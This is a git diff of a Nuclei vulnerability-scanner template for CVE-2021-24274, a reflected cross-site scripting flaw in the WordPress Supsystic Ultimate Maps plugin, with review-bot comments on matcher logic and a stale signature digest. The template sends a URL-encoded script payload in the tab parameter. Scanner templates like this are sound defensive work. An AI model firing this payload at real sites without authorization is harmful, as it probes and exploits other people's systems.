diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml index 2762017b15..5d5773e35a 100644 --- a/http/cves/2021/CVE-2021-24274.yaml +++ b/http/cves/2021/CVE-2021-24274.yaml @@ -2,7 +2,7 @@ id: CVE-2021-24274 info: name: WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting - author: dhiyaneshDK + author: DhiyaneshDK severity: medium description: WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute. impact: | @@ -28,19 +28,34 @@ info: vendor: supsystic product: ultimate_maps framework: wordpress - tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,maps,supsystic + tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,maps,supsystic,xss + +flow: http(1) && http(2) http: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/ultimate-maps-by-supsystic/modules/maps/css/' + condition: and + + - raw: + - | + GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} matchers-condition: and matchers: - type: word + part: body words: - '' - condition: and - type: word part: header 
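Review bot: The new `flow: http(1) && http(2)` gate runs the XSS probe only when the front page references `/wp-content/plugins/ultimate-maps-by-supsystic/modules/maps/css/`, so a site with the plugin active that presumably loads that stylesheet only on pages embedding a map would be skipped and reported clean. Matching the shorter prefix `/wp-content/plugins/ultimate-maps-by-supsystic/` in the internal matcher would reduce that false-negative risk, and its `condition: and` can be dropped because it has no effect with a single word. In the second request the body matcher appears on this page as `- ''`, which may only be a rendering loss of the reflected payload. If the file really holds an empty word, it matches every body and the finding rests on the header and status matchers alone, so the word should be the exact reflected `tab` value. A comment above the first request, such as `# fingerprint: continue only when the plugin's assets are referenced`, would tell maintainers why two requests are needed.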
@@ -50,4 +65,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220132a7e45098649917c5b1ac8ddfd5f6b71d5af732a45f4ffb3ae88a1685501e0022100949f391c614e80a67397c2e5ffc049401d3fff718ff85c184a644d9052478095:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220132a7e45098649917c5b1ac8ddfd5f6b71d5af732a45f4ffb3ae88a1685501e0022100949f391c614e80a67397c2e5ffc049401d3fff718ff85c184a644d9052478095:922c64590222798bb761d5b6d8e72950
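Review bot: The `# digest:` trailer is re-added with the same value it had before, although the earlier hunks change the template's requests and matchers, so the signature presumably no longer corresponds to the file content. If the digest is meant to let consumers verify that the template was not altered, it should be regenerated by the project's signing step after this change rather than carried over; if CI re-signs on merge, no action is needed here.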